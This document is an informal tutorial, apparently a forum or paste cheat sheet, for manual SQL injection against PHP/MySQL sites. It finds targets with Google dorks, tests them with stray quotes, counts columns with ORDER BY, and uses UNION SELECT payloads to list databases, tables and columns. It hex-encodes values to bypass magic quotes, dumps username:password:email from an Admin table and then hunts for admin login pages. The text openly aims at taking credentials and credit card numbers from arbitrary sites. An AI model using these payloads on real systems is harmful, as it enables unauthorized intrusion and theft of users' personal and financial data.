SQLi Tutorial

1. cheat sheet for manual SQLi
2.  
3. 1.) first find something exploitable either with dorks or by browsing your favorite site and attempting different links
4.  
5. here's a testing dork that works fairly well
6. buy.php?id=
7.  
8. 2.) To check if it's exploitable, simply add a ' before or after the number
9.  
10. http://example.com/buy.php?id='1
11. or
12. http://example.com/buy.php?id=1'
13.  
14. if you get a warning about mysql_fetch_array or some sort of error at all, that means it's exploitable
15.  
16. If a website result you pick is something like this
17.  
18. http://example.com/buy.php?id=1&food;cid=2
19.  
20. you have to set it up for vulnerability testing like this
21.  
22. http://example.com/buy.php?id='1&food;cid='2
23. or
24. http://example.com/buy.php?id=1'&food;cid=2'
25.  
26. Once you know your exploitable and injectable, move onto the next step!
27.  
28. 3.) In this step we will determine the number of columns in the table. To do this, simply use an "Order By" command like so
29.  
30. http://example.com/buy.php?id=1 ORDER BY 1--
31.  
32. How i speed up this process is I mostly try giant numbers like 100, and divide by 2 on my way down. You've hit the nymber of columns when you hit an error... like this
33.  
34. http://example.com/buy.php?id=1 ORDER BY 100-- < Error
35. http://example.com/buy.php?id=1 ORDER BY 50-- < Error
36. http://example.com/buy.php?id=1 ORDER BY 25-- < Error
37. http://example.com/buy.php?id=1 ORDER BY 10-- < Error
38. http://example.com/buy.php?id=1 ORDER BY 5-- < Error
39. http://example.com/buy.php?id=1 ORDER BY 4-- < No Error
40.  
41. Site has 4 columns
42.  
43. From here, we move on to figuring out WHICH column is the exploitable one
44.  
45. 4.) This is a somewhat simple step. We're going to display the columns and which ever one pops up on screen is the one that's exploitable.
46.  
47. http://example.com/buy.php?id=-1 UNION SELECT 1,2,3,4--
48.  
49. The number of the column... we'll say it was 2 for this... should pop up SOMEWHERE on the page, usually at the top.
50.  
51. 5.) Now we need figure out the name of the Database we're working with. First we need to determine the SQL Version. For this, we use the Exploitable Column we found out. We used 2 in the last example so we'll keep it uniform with 2 here
52.  
53. example
54. http://example.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--
55.  
56. Since 2 was the vulnerable column, this is where @@version belongs. the version of the in the same place you found the 2 for the exploitable column.
57.  
58. If the version shows up and it looks like it's in hexidecimal, simply just use the unhex command like so
59.  
60. http://example.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--
61.  
62. If the unhex is used here, you have to use it for the rest of the injection as well.
63.  
64. The version should look something sort of similar to the example below
65.  
66. Example: 5.2-community-log
67.  
68. That's the version!
69.  
70. Note. If you come across Version 4.x, you'll need a different tutorial as the injection is different.
71.  
72. 6.) Finding the Database, this isn't something you always HAVE to do, but it is useful for dumping purposes.
73.  
74. To find the DB, you need to use a query like the example
75.  
76. http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--
77.  
78. This should get you more results over the method above. either one works
79.  
80. http://example.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--
81.  
82. Now you have the DB!
83.  
84. 7.) Now the fun stuff :P
85.  
86. This is where you get usernames, passwords, credit card numbers, addresses, phone numbers.... almost anything you want from the DB
87.  
88. Finding the table names, this is important so you know where to actually look for the information. To do this, see the query example below
89.  
90.  
91. http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
92.  
93. It may look a little confusing and like a lot of work, but it really isn't.
94. Basically what this does is it groups (group_concat) the "table names" (table_name) together and gathers that info "from" (FROM) the information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).
95.  
96. While using group_cat, you will only be able to see 1024 characters worth of tables. So, if you notice that the table just randomly cuts off, you'll need to switch the limit. See the example
97.  
98.  
99. http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--
100.  
101. what this does is show you only the first table. If you were to run out of characters at lets say the 30th table, you could use it like this
102.  
103. http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 29,1--
104.  
105. Now, the limit is 29,1... Why is that? this is because when using the Limit query, it starts from 0,1 which means the 29th table is actually the 30th.
106.  
107. Now you have table names, congrats! You're so close!
108.  
109. 8.) Getting the Column names. You got the table, but that's not enough to extract data, so you need the column names as well. Usually, they're easy to guess such as User(s), Admin(s), tblUser(s), tblAdmin(s), etc.. but it honestly varies.
110.  
111. After deciding which table you think contains what you're looking for, use the following query... note that i'm using the Admin table name
112.  
113. http://example.com/buy?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.colums WHERE table_name="Admin"--
114.  
115. This will give you a list of all the colums within the table OR give you an error, but it's nothing to worry about if you get the error. All this means is that "Magic Quotes" is turned on. This can be easily bypassed by using a hex or char converter to convert the normal text into char or hex. link to a hex and char converter is below
116.  
117. Hex/Char Converter
118. http://www.swingnote.com/tools/texttohex.php
119.  
120. If you get an error at this point, you must do the following steps:
121.  
122. 1.) Copy the name of the table that you're trying to access.
123. 2.) Paste the name of the table into the converter above where it says "Say hello to my little friend"
124. 3.) Click convert.
125. 4.) Copy the string of numbers/letters under hex into your query so it looks like the following
126.  
127. http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
128.  
129. Notice the 0x that's added, this tells the server that the characters are a hex string, that's all.
130.  
131. From there, you should see a list of colums within the table such as username, password, email, id, etc.
132. Using the Limit function works here as well
133.  
134. 9.) Displaying the column content. The Home Stretch!
135.  
136. If you've made it this far, congrats! You've basically completed your task of SQL injection manually without any script kiddy tools!
137.  
138. All that's left to do is see what's in the columns and use the information! We need to decide which columns we want to see and use this query below (note i'm using username password email and id, the db will be named "mydb1234"). This is where the database name comes in handy
139.  
140. http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email,0x3a,id),3,4 FROM mydb1234.Admin--
141.  
142. in this query, the 0x3a is the hex value of a Colon (:) which will group the username:password:email:id for the individual users! Simple right?!?
143.  
144. Guess what! You're done! you got the info! Now all you need to do is find the admin login! This can be simple
145.  
146. 10.) Finding an admin page or login page...
147.  
148. Most dev's are either stupid or ust don't care because they think they're better than they are and hide these in plain site... examples below are some locations of logins i've seen the most
149.  
150. http://example.com/admin
151. http://example.com/apanel
152. http://example.com/wp-admin (this would be a wordpress site)
153. http://example.com/wp-login.php (also wordpress specific)
154. http://example.com/login.php
155. http://example.com/user/login.php
156. http://example.com/users/login.php
157. http://example.com/modlogin/
158. http://example.com/mod/
159. http://example.com/moderator
160.  
161. you get the picture. You can also use google to attempt to find the admin page, but that only works about 40 percent of the time. For that you'd want to search something like
162.  
163. inurl:admin|login|user|wp-admin "example.com"
164. or
165. example intitle:"admin|login|user"
166.  
167. The "|" tags tell google to look specifically for that word. Whereas you might know of the "+" used similarly in searches but that turns it into a full string.
168.  
169. It's very easy to find a dork list as well... if you'd like to try and find one, just google it with the following
170.  
171. inurl:pastebin "google+dork"
172.  
173. you're done!